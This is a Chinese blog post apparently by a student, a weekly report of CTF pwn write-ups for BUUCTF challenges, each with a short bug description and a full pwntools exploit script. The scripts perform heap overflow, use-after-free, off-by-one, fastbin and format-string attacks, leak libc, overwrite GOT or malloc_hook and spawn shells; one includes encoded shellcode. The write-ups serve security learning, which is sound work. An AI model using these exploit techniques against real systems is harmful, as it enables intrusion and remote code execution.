第六周周报

最新推荐文章于 2024-07-23 15:37:34 发布
最新推荐文章于 2024-07-23 15:37:34 发布
阅读量627 收藏 6
点赞数 10
文章标签: ubuntu python linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79525044/article/details/139235009
版权
babyfengshui_33c3_2016

32位开启了NX和canary保护

add函数会先malloc一个我们自定义的函堆块,再malloc一个0x80的堆块。

漏洞出现在edit函数,,这里的检查方式有问题,它将存放name的堆地址与我们自定义的堆地址比较,如果我们通过堆分配将两个堆分开,就可以制造堆溢出了。

先add三个chunk

add(0x80,b'a',b'a')
add(0x80,b'a',b'a')
add(0x8,b'a',b'/bin/sh\x00')

再free(0),这样被free掉的两个chunk就会合并,

我们再add一个0x100的chunk,堆管理器就会从top chunk中重新划出一个新的0x80的chunk来,这样add出来的0x100的chunk就可以堆溢出了。

随后就是堆溢出的利用了,先将指向chunk1的指针改为free_got,show获得libc_base,再将freegot中的内容改为system。

exp

from pwn import *
from LibcSearcher import *
from struct import pack
context.log_level='debug'
context(os = 'linux', arch = 'i386')

#p = process('./pwn')
p = remote('node4.buuoj.cn', 26501)
elf = ELF('./pwn')
libc = ELF('buu/libc-2.23.so')

def add(size, name, text):
p.sendlineafter(b'Action: ', '0')
p.sendlineafter(b'size of description: ', str(size))
p.sendlineafter(b'name: ', name)
p.sendlineafter(b'text length: ', str(len(text)))
p.sendafter(b'text: ', text)
def free(index):
p.sendlineafter(b'Action: ', '1')
p.sendlineafter(b'index: ', str(index))
def dump(index):
p.sendlineafter(b'Action: ', '2')
p.sendlineafter(b'index: ', str(index))
def edit(index, lens, text):
p.sendlineafter(b'Action: ', '3')
p.sendlineafter(b'index: ', str(index))
p.sendlineafter(b'text length: ', str(lens))
p.sendafter(b'text: ', text)
def exit():
p.sendlineafter(b'Action: ', '4')

add(0x80, b'a', b'a')
add(0x80, b'b', b'b')
add(0x10, b'/bin/sh\x00', b'/bin/sh\x00')
free(0)
add(0x100, b'd', b'd')
edit(3, 0x19c, b'\x00'*0x198 + p32(elf.got['puts']))

dump(1)
p.recvuntil(b'description: ')
puts_addr = u32(p.recv(4))
print('puts_addr =>', hex(puts_addr))
libcbase = puts_addr - libc.sym['puts']
system = libcbase + libc.sym['system']

edit(3, 0x19c, b'\x00'*0x198 + p32(elf.got['free']))

edit(1, 0x4, p32(system))

free(2)

p.interactive()
0ctf_2017_babyheap

64位保护全开。

存在堆溢出漏洞。跟第二页一道题一模一样。

exp

from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *

def debug(c = 0):
    if(c):
        gdb.attach(p, c)
    else:
        gdb.attach(p)
        pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa  = lambda text,data  :p.sendafter(text, data)
sl  = lambda data   :p.sendline(data)
sla = lambda text,data  :p.sendlineafter(text, data)
r   = lambda num=4096   :p.recv(num)
rl  = lambda text   :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter   = lambda        :p.interactive()
l32 = lambda    :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda    :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32    = lambda    :u32(p.recv(4).ljust(4,b'\x00'))
uu64    = lambda    :u64(p.recv(6).ljust(8,b'\x00'))
int16   = lambda data   :int(data,16)
lg= lambda s, num   :p.success('%s -> 0x%x' % (s, num))
#------------------------------------------------------------------------------------

#context(os='linux', arch='i386', log_level='debug')
context(os='linux', arch='amd64', log_level='debug')
#p=process('0ctf_2017_babyheap')
p = remote('node5.buuoj.cn',25360)
elf=ELF('0ctf_2017_babyheap')
libc=ELF('./libcs/buu/libc-2.2364.so')


def add(size):
    sla(b'Command: ', '1')
    sla(b'Size: ',str(size))
    
def show(index):
    sla(b'Command: ', '4')
    sla(b'Index: ', str(index))
    
def free(index):
    sla(b'Command: ', '3')
    sla(b'Index: ', str(index))

def edit(index,text):
    sla(b'Command: ','2')
    sla(b'Index: ',str(index))
    sla(b'Size: ',str(len(text)))
    sla(b'Content: ',text)

#gdb.attach(p)
add(0x10)#0
add(0x10)#1
add(0x10)#2
add(0x10)#3
add(0x80)#4

free(1)
free(2)

payload=p64(0)*3+p64(0x21)+p64(0)*3+p64(0x21)+p8(0x80)
edit(0,payload)

payload=p64(0)*3+p64(0x21)
edit(3,payload)

add(0x10)#1
add(0x10)#2

payload = p64(0)*3+p64(0x91)
edit(3,payload)
add(0x20)#5

free(4)
show(2)
#pause()

libc_base=l64()-libc.sym['__malloc_hook']-88-0x10
print(hex(libc_base))
one_gadget=libc_base+0x4526a

add(0x60)#4
free(4)
payload=p64(libc_base+0x3c4aed)
edit(2,payload)

add(0x60)
add(0x60)

payload=b'a'*0x13+p64(one_gadget)
edit(6,payload)

add(0x10)
inter()
hitcon2014_stkof

64位,开启了NX和canary。

edit函数存在堆溢出

没有show函数。

我们可以通过将free函数改为putsplt来泄露libcbase。

通过堆溢出来将bss段上保存堆指针的地方改为fakechunk,从而实现修改free_got。

exp

from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *

def debug(c = 0):
    if(c):
        gdb.attach(p, c)
    else:
        gdb.attach(p)
        pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa  = lambda text,data  :p.sendafter(text, data)
sl  = lambda data   :p.sendline(data)
sla = lambda text,data  :p.sendlineafter(text, data)
r   = lambda num=4096   :p.recv(num)
rl  = lambda text   :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter   = lambda        :p.interactive()
l32 = lambda    :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda    :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32    = lambda    :u32(p.recv(4).ljust(4,b'\x00'))
uu64    = lambda    :u64(p.recv(6).ljust(8,b'\x00'))
int16   = lambda data   :int(data,16)
lg= lambda s, num   :p.success('%s -> 0x%x' % (s, num))
#------------------------------------------------------------------------------------

#context(os='linux', arch='i386', log_level='debug')
context(os='linux', arch='amd64', log_level='debug')
#p=process('stkof')
p = remote('node5.buuoj.cn',25748)
elf=ELF('stkof')
libc=ELF('./libcs/buu/libc-2.2364.so')

def add(size):
    p.sendline(b'1')
    p.sendline(str(size))
    p.recvuntil("OK\n")

def free(index):
     p.sendline(b'3')
     p.sendline(str(index).encode())

def edit(index,context):
    p.sendline(str(2))
    p.sendline(str(index).encode())
    p.sendline(str(len(context)))
    p.send(context)
    p.recvuntil("OK\n")
    

fake_chunk=0x6020cd
#gdb.attach(p)
add(0x10)
add(0x10)
add(0x10)
add(0x60)
add(0x60)
add(0x10)
add(0x10)
#pause()
free(4)
free(5)

payload=p64(0)*3+p64(0x71)+p64(0)*13+p64(0x71)+p64(fake_chunk)
edit(3,payload)

add(0x60)
add(0x60)

payload=b'a'*0x6b+p64(elf.got['free'])+p64(elf.got['puts'])
edit(9,payload)

edit(1, p64(elf.plt['puts']))

free(2)

libc_base=l64()-libc.sym['puts']
print(hex(libc_base))
system=libc_base+libc.sym['system']

edit(7, b'/bin/sh\x00')
edit(1, p64(system))
free(7)

inter()
mrctf2020_shellcode_revenge

64位,开启了pie和Full RELRO

 需要写入不存在被限制字符的shellcode。

exp

from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *

def debug(c = 0):
    if(c):
        gdb.attach(p, c)
    else:
        gdb.attach(p)
        pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa  = lambda text,data  :p.sendafter(text, data)
sl  = lambda data   :p.sendline(data)
sla = lambda text,data  :p.sendlineafter(text, data)
r   = lambda num=4096   :p.recv(num)
rl  = lambda text   :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter   = lambda        :p.interactive()
l32 = lambda    :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda    :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32    = lambda    :u32(p.recv(4).ljust(4,b'\x00'))
uu64    = lambda    :u64(p.recv(6).ljust(8,b'\x00'))
int16   = lambda data   :int(data,16)
lg= lambda s, num   :p.success('%s -> 0x%x' % (s, num))
#------------------------------------------------------------------------------------

#context(os='linux', arch='i386', log_level='debug')
context(os='linux', arch='amd64', log_level='debug')
#p=process('mrctf2020_shellcode_revenge')
p = remote('node5.buuoj.cn',25126)
elf=ELF('mrctf2020_shellcode_revenge')
libc=ELF('./libcs/buu/libc-2.2364.so')

def add(size):
    p.sendline(b'1')
    p.sendline(str(size))
    p.recvuntil("OK\n")

def free(index):
     p.sendline(b'3')
     p.sendline(str(index).encode())

def edit(index,context):
    p.sendline(str(2))
    p.sendline(str(index).encode())
    p.sendline(str(len(context)))
    p.send(context)
    p.recvuntil("OK\n")
    
payload=b'Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t'

p.send(payload)
p.interactive()
pwnable_hacknote

32位开启了canary和NX保护。

add函数先malloc一个0x8大小的chunk,将puts函数的地址和自定义chunk的地址存放在其中,再malloc自定义的chunk。

没有将指针置零,存在uaf漏洞。

先通过uaf漏洞泄露libc_base。

申请两个chunk并释放,再申请一个0x8大小的chunk。这样就可以对show函数put的内容进行改写了。

以这种方式先泄露libc_base,再调用system。

exp

from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *

def debug(c = 0):
    if(c):
        gdb.attach(p, c)
    else:
        gdb.attach(p)
        pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa  = lambda text,data  :p.sendafter(text, data)
sl  = lambda data   :p.sendline(data)
sla = lambda text,data  :p.sendlineafter(text, data)
r   = lambda num=4096   :p.recv(num)
rl  = lambda text   :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter   = lambda        :p.interactive()
l32 = lambda    :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda    :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32    = lambda    :u32(p.recv(4).ljust(4,b'\x00'))
uu64    = lambda    :u64(p.recv(6).ljust(8,b'\x00'))
int16   = lambda data   :int(data,16)
lg= lambda s, num   :p.success('%s -> 0x%x' % (s, num))
#------------------------------------------------------------------------------------

context(os='linux', arch='i386', log_level='debug')
#context(os='linux', arch='amd64', log_level='debug')
#p=process('hacknote (1)')
p = remote('node5.buuoj.cn',25467)
elf=ELF('hacknote (1)')
libc=ELF('./libcs/buu/libc-2.2332.so')

def add(size, content):
    sla(b'Your choice :', '1')
    sla(b'Note size :', str(size))
    sa(b'Content :', content)

def free(idx):
    sla(b'choice :',b'2')
    sla(b'Index :',str(idx))

def show(idx):
    sla(b'choice :',b'3')
    sla(b'Index :',str(idx))

#gdb.attach(p)
add(0x20, b'a')
add(0x20, b'assssss')
 
free(0)
free(1)
add(0x8,p32(0x804862b)+p32(elf.got['free']))

show(0)
libc_base=l32()-libc.sym['free']
system=libc_base+libc.sym['system']
print(hex(libc_base))

free(2)
add(0x8,p32(system)+b';sh\x00')
 
show(0)

inter()
wdb_2018_2nd_easyfmt

32位NX保护。

明显的格式化字符串漏洞。

无限循环,可以多次修改。

先泄露libc_base。

再将printfgot修改为system即可。

exp

from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *

def debug(c = 0):
    if(c):
        gdb.attach(p, c)
    else:
        gdb.attach(p)
        pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa  = lambda text,data  :p.sendafter(text, data)
sl  = lambda data   :p.sendline(data)
sla = lambda text,data  :p.sendlineafter(text, data)
r   = lambda num=4096   :p.recv(num)
rl  = lambda text   :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter   = lambda        :p.interactive()
l32 = lambda    :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda    :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32    = lambda    :u32(p.recv(4).ljust(4,b'\x00'))
uu64    = lambda    :u64(p.recv(6).ljust(8,b'\x00'))
int16   = lambda data   :int(data,16)
lg= lambda s, num   :p.success('%s -> 0x%x' % (s, num))
#------------------------------------------------------------------------------------

context(os='linux', arch='i386', log_level='debug')
#context(os='linux', arch='amd64', log_level='debug')
#p=process('wdb_2018_2nd_easyfmt')
p = remote('node5.buuoj.cn',27896)
elf=ELF('wdb_2018_2nd_easyfmt')
libc=ELF('./libcs/buu/libc-2.2332.so')

def add(size, content):
    sla(b'Your choice :', '1')
    sla(b'Note size :', str(size))
    sa(b'Content :', content)

def free(idx):
    sla(b'choice :',b'2')
    sla(b'Index :',str(idx))

def show(idx):
    sla(b'choice :',b'3')
    sla(b'Index :',str(idx))

payload=b'%7$s'+p32(elf.got['puts'])
sla(b'repeater?\n',payload)
libc_base=l32()-libc.sym['puts']
system=libc_base+libc.sym['system']
print(hex(libc_base))

payload = fmtstr_payload(6,{elf.got['printf']:system})
s(payload)
s("/bin/sh\x00")
inter()
roarctf_2019_easy_pwn

64位保护全开。

edit函数存在off by one漏洞。

利用off by one漏洞创造一个fakechunk,将他free掉再malloc回来,这样就可以利用fakechunk控制另一个chunk的内容了,先泄露libc_base。

再通过fastbin attack来修改malloc_hook为one_gadget。

但是由于这里的onegadget都不可使用,所以需要利用realloc来修改环境变量。

exp

from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *

def debug(c = 0):
    if(c):
        gdb.attach(p, c)
    else:
        gdb.attach(p)
        pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa  = lambda text,data  :p.sendafter(text, data)
sl  = lambda data   :p.sendline(data)
sla = lambda text,data  :p.sendlineafter(text, data)
r   = lambda num=4096   :p.recv(num)
rl  = lambda text   :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter   = lambda        :p.interactive()
l32 = lambda    :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda    :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32    = lambda    :u32(p.recv(4).ljust(4,b'\x00'))
uu64    = lambda    :u64(p.recv(6).ljust(8,b'\x00'))
int16   = lambda data   :int(data,16)
lg= lambda s, num   :p.success('%s -> 0x%x' % (s, num))
#------------------------------------------------------------------------------------

#context(os='linux', arch='i386', log_level='debug')
context(os='linux', arch='amd64', log_level='debug')
#p=process('roarctf_2019_easy_pwn')
p = remote('node5.buuoj.cn',25157)
elf=ELF('roarctf_2019_easy_pwn')
libc=ELF('./libcs/buu/libc-2.2364.so')

def add(size):
    sla(b'choice: ',b'1')
    sla(b'size: ', str(size))

def edit(idx,size,content):
    sla(b'choice: ',b'2')
    sla(b'index: ', str(idx))
    sla(b'size: ', str(size))
    sla(b'content: ', content)

def free(idx):
    sla(b'choice: ',b'3')
    sla(b'index: ',str(idx))

def show(idx):
    sla(b'choice: ',b'4')
    sla(b'index: ',str(idx))

#gdb.attach(p)
add(0x18)
add(0x10)
add(0x80)
add(0x10)

payload=p64(0)*3+p8(0xb1)
edit(0,0x18+0xa,payload)

free(1)

add(0xa0)
edit(1,0x20,p64(0)*3+p64(0x91))

free(2)
show(1)
libc_base=l64()-88-0x10-libc.sym['__malloc_hook']
print(hex(libc_base))
realloc_hook = libc_base + libc.sym['realloc']
one_gadget=libc_base+0x4526a

add(0x60)
free(2)

fake_chunk=libc.sym['__malloc_hook']+libc_base-0x23
edit(1,0x28,p64(0)*3+p64(0x71)+p64(fake_chunk))
print(hex(fake_chunk))

add(0x60)
add(0x60)

edit(4,0x1b,b'a'*0xb+p64(one_gadget)+p64(realloc_hook))
#pause()
add(0x10)
inter()
npuctf_2020_easyheap

64位开启了NX和canary保护。

create函数先malloc一个0x10的chunk,再malloc自定义的chunk。自定义chunk大小只能是0x18或0x38。

edit函数存在off by one漏洞。

通过off by one漏洞将自定义1的chunk跟0x10的chunk倒过来,并修改chunk的大小,使其可以覆盖0x10的chunk。随后将指向堆的指针修改为指向freegot,然后写入systemplt。

exp

from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *

def debug(c = 0):
    if(c):
        gdb.attach(p, c)
    else:
        gdb.attach(p)
        pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa  = lambda text,data  :p.sendafter(text, data)
sl  = lambda data   :p.sendline(data)
sla = lambda text,data  :p.sendlineafter(text, data)
r   = lambda num=4096   :p.recv(num)
rl  = lambda text   :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter   = lambda        :p.interactive()
l32 = lambda    :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda    :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32    = lambda    :u32(p.recv(4).ljust(4,b'\x00'))
uu64    = lambda    :u64(p.recv(6).ljust(8,b'\x00'))
int16   = lambda data   :int(data,16)
lg= lambda s, num   :p.success('%s -> 0x%x' % (s, num))
#------------------------------------------------------------------------------------

#context(os='linux', arch='i386', log_level='debug')
context(os='linux', arch='amd64', log_level='debug')
#p=process('npuctf_2020_easyheap')
p = remote('node5.buuoj.cn',29524)
elf=ELF('npuctf_2020_easyheap')
libc=ELF('./libcs/buu/libc-2.2764.so')

def add(size,content):
    sla(b'choice :',b'1')
    sla(b'only) : ', str(size))
    sla(b'Content:',content)

def edit(idx,content):
    sla(b'choice :',b'2')
    sla(b'Index :', str(idx))
    sla(b'Content: ', content)

def free(idx):
    sla(b'choice :',b'4')
    sla(b'Index :',str(idx))

def show(idx):
    sla(b'choice :',b'3')
    sla(b'Index :',str(idx))

#gdb.attach(p)

add(0x18,b'a')
add(0x18,b'a')
add(0x18,b'a')

payload=b'/bin/sh\x00'+p64(0)*2+p8(0x41)
edit(0,payload)

free(1)

add(0x38,b'a')
edit(1,p64(0)*3+p64(0x21)+p64(0x38)+p64(elf.got['free']))

show(1)
libc_base=l64()-libc.sym['free']
system=libc_base+libc.sym['system']

edit(1,p64(system))
free(0)
#pause()
inter()
hitcontraining_bamboobox

64位开启了NX和canary保护。

存在后门函数。

载入程序会先创建一个0x10的chunk。

edit函数存在堆溢出漏洞。

后门函数给出的地址是错误的,我们使用fastbin attack,来getshell。

exp

from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *

def debug(c = 0):
    if(c):
        gdb.attach(p, c)
    else:
        gdb.attach(p)
        pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa  = lambda text,data  :p.sendafter(text, data)
sl  = lambda data   :p.sendline(data)
sla = lambda text,data  :p.sendlineafter(text, data)
r   = lambda num=4096   :p.recv(num)
rl  = lambda text   :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter   = lambda        :p.interactive()
l32 = lambda    :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda    :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32    = lambda    :u32(p.recv(4).ljust(4,b'\x00'))
uu64    = lambda    :u64(p.recv(6).ljust(8,b'\x00'))
int16   = lambda data   :int(data,16)
lg= lambda s, num   :p.success('%s -> 0x%x' % (s, num))
#------------------------------------------------------------------------------------

#context(os='linux', arch='i386', log_level='debug')
context(os='linux', arch='amd64', log_level='debug')
#p=process('bamboobox')
p = remote('node5.buuoj.cn',29792)
elf=ELF('bamboobox')
libc=ELF('./libcs/buu/libc-2.2364.so')

def add(size, content):
    sla(b'Your choice:', '2')
    sla(b'Please enter the length of item name:', str(size))
    sa(b'Please enter the name of item:', content)

def show():
    sla(b'Your choice:', '1')

def edit(index, content):
    sla(b'Your choice:', '3')
    sla(b'Please enter the index of item:', str(index))
    sla(b'Please enter the length of item name:', str(len(content)))
    sa(b'Please enter the new name of the item:', content)

def free(index):
    sla(b'Your choice:', '4')
    sla(b'Please enter the index of item:', str(index))

#gdb.attach(p)
add(0x10, b'a')
add(0x60, b'b')
add(0x60, b'c')
add(0x10, b'd')
#pause()
free(2)
free(1)

fake_chunk = 0x60209d

payload=p64(0)*3 + p64(0x71)+p64(fake_chunk)
edit(0, payload)

add(0x60, b'a')
add(0x60, b'b')

edit(2, b'a'*0x1b + p64(elf.got['atoi']))
#pause()
show()
atoi= u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
libc_base=atoi-libc.sym['atoi']
print(hex(libc_base))
system =libc_base+ libc.sym['system']

edit(0, p64(system))

sla(b'Your choice:', '/bin/sh\x00')
inter()
inndy_echo

32位,NX保护。

存在格式化字符串漏洞,不存在栈溢出。

已经给出了system函数,不需要泄露libc_base。

exp

from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *

def debug(c = 0):
    if(c):
        gdb.attach(p, c)
    else:
        gdb.attach(p)
        pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa  = lambda text,data  :p.sendafter(text, data)
sl  = lambda data   :p.sendline(data)
sla = lambda text,data  :p.sendlineafter(text, data)
r   = lambda num=4096   :p.recv(num)
rl  = lambda text   :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter   = lambda        :p.interactive()
l32 = lambda    :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda    :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32    = lambda    :u32(p.recv(4).ljust(4,b'\x00'))
uu64    = lambda    :u64(p.recv(6).ljust(8,b'\x00'))
int16   = lambda data   :int(data,16)
lg= lambda s, num   :p.success('%s -> 0x%x' % (s, num))
#------------------------------------------------------------------------------------

context(os='linux', arch='i386', log_level='debug')
#context(os='linux', arch='amd64', log_level='debug')
#p=process('./echo')
p=remote('node5.buuoj.cn',28256)
elf=ELF('./echo')
libc=ELF('./libcs/buu/libc-2.2332.so')

def add(size, content):
    sla(b'Your choice:', '2')
    sla(b'Please enter the length of item name:', str(size))
    sa(b'Please enter the name of item:', content)

def show():
    sla(b'Your choice:', '1')

def edit(index, content):
    sla(b'Your choice:', '3')
    sla(b'Please enter the index of item:', str(index))
    sla(b'Please enter the length of item name:', str(len(content)))
    sa(b'Please enter the new name of the item:', content)

def free(index):
    sla(b'Your choice:', '4')
    sla(b'Please enter the index of item:', str(index))

#gdb.attach(p)

payload=fmtstr_payload(7, {elf.got['printf']:elf.sym['system']})
sl(payload)
 
sl(b'/bin/sh\x00')

inter()
hitcontraining_unlink

跟hitcontraining_bamboobox一模一样。

wustctf2020_easyfast

64位NX和canary保护。

存在uaf漏洞。

edit最多写八字节数据。

最多add四次。

将0x602090改为0即可获得shell。

利用uaf漏洞来将0x602090申请出来。

题目将这里设置为50,所以为了绕过检查,我们add时add0x40大小。

exp

from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *

def debug(c = 0):
    if(c):
        gdb.attach(p, c)
    else:
        gdb.attach(p)
        pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa  = lambda text,data  :p.sendafter(text, data)
sl  = lambda data   :p.sendline(data)
sla = lambda text,data  :p.sendlineafter(text, data)
r   = lambda num=4096   :p.recv(num)
rl  = lambda text   :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter   = lambda        :p.interactive()
l32 = lambda    :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda    :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32    = lambda    :u32(p.recv(4).ljust(4,b'\x00'))
uu64    = lambda    :u64(p.recv(6).ljust(8,b'\x00'))
int16   = lambda data   :int(data,16)
lg= lambda s, num   :p.success('%s -> 0x%x' % (s, num))
#------------------------------------------------------------------------------------

#context(os='linux', arch='i386', log_level='debug')
context(os='linux', arch='amd64', log_level='debug')
#p=process('wustctf2020_easyfast')
p = remote('node5.buuoj.cn',25103)
elf=ELF('wustctf2020_easyfast')
libc=ELF('./libcs/buu/libc-2.2364.so')

def add(size):
    sla('choice>\n','1')
    sla('size>\n',str(size))
def free(index):
    sla('choice>\n','2')
    sla('index>\n',str(index))
def edit(index,content):
    sla('choice>\n','3')
    sla('index>\n',str(index))
    s(content)


#gdb.attach(p)

add(0x40)
add(0x40)
#pause()
free(0)
free(1)
 
fake_chunk=0x602080
edit(1,p64(fake_chunk))
add(0x40)
#pause()
add(0x40)
#pause()
edit(3, p64(0))
sla(b'choice>\n', '4')

inter()
cmcc_pwnme1

32位保护全关。

存在后门函数。

无限循环。

存在栈溢出。

后门函数无效,flag没有存放在那里。

使用ret2libc。

exp

from pwn import *
from struct import pack
context.log_level='debug'
context(os = 'linux', arch = 'i386')
 

p = remote('node5.buuoj.cn',25552)
elf = ELF('./pwnme1')
libc = ELF('./libcs/buu/libc-2.2332.so')
 
s = 0x8048913

p.sendlineafter(b'>> 6. Exit    \n', b'5')
payload = b'a'*0xa4 + b'stop' + p32(elf.plt['puts']) + p32(elf.sym['main']) +  p32(elf.got['puts'])
p.sendlineafter(b'Please input the name of fruit:', payload)
p.recvline()
puts = u32(p.recv(4))
libcbase = puts - libc.sym['puts']
system = libcbase + libc.sym['system']
binsh = libcbase + next(libc.search(b'/bin/sh\x00'))
 

p.sendlineafter(b'>> 6. Exit    \n', b'5')
payload = b'a'*0xa8 + p32(system) + p32(elf.sym['main']) + p32(binsh)
p.sendlineafter(b'Please input the name of fruit:', payload)
p.interactive()
actf_2019_babyheap

64位,Full RELRO开启了NX保护和canary。

add函数先malloc一个0x10大小的chunk,再add自定义chunk。

存在/bin/sh字符串。

存在uaf漏洞。

已经给出了system函数。

利用uaf漏洞

修改调用system('/bin/sh')

exp

from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *

def debug(c = 0):
    if(c):
        gdb.attach(p, c)
    else:
        gdb.attach(p)
        pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa  = lambda text,data  :p.sendafter(text, data)
sl  = lambda data   :p.sendline(data)
sla = lambda text,data  :p.sendlineafter(text, data)
r   = lambda num=4096   :p.recv(num)
rl  = lambda text   :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter   = lambda        :p.interactive()
l32 = lambda    :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda    :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32    = lambda    :u32(p.recv(4).ljust(4,b'\x00'))
uu64    = lambda    :u64(p.recv(6).ljust(8,b'\x00'))
int16   = lambda data   :int(data,16)
lg= lambda s, num   :p.success('%s -> 0x%x' % (s, num))
#------------------------------------------------------------------------------------

#context(os='linux', arch='i386', log_level='debug')
context(os='linux', arch='amd64', log_level='debug')
#p=process('ACTF_2019_babyheap')
p = remote('node5.buuoj.cn',25106)
elf=ELF('ACTF_2019_babyheap')
libc=ELF('./libcs/buu/libc-2.2764.so')

def add(size, content):
    sla(b'Your choice: ', '1')
    sla(b'Please input size: \n', str(size))
    sl(b'Please input content: \n', content)
def free(index):
    sla(b'Your choice: ', '2')
    sla(b'Please input list index: \n', str(index))
def show(index):
    sla(b'Your choice: ', '3')
    sla(b'Please input list index: \n', str(index))
 
add(0x20, b'a')
add(0x20, b'a')

free(0)
free(1)

add(0x10, p64(0x602010) + p64(elf.sym['system']))

show(0)
 
inter()

拓䜣
关注
  • 10
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java开发周报_java第六周周报
weixin_39943678的博客
02-16 1489
前言本周是学习java的第六周,把容器大部分内容学完了。参考教程:本周学习要点:1.Map中的HashMap和TreeMap区别不大,效率上使用HashMap,需要用到排序时使用TreeMap。2.TreeMap是典型的红黑二叉树的实现。3.TreeMap会按照key递增的方式排序,在使用自己定义的类时需要实现comparable接口并重写CompareTo方法。4.HashMap和HashTab...
创新实训第六周周报
hu15144354443的博客
05-29 385
生成一篇日报/周报</p><p @click="assign('撰写一篇邮件/演讲稿')">撰写一篇邮件/演讲稿</p><p @click="assign('写一篇方案报告')">写一篇方案报告</p><p @click="assign('代码报错解决')">代码报错解决</p><p @click="assign('文章润色')">文章润色
数据挖掘第六周周报
qq_32019707的博客
11-02 189
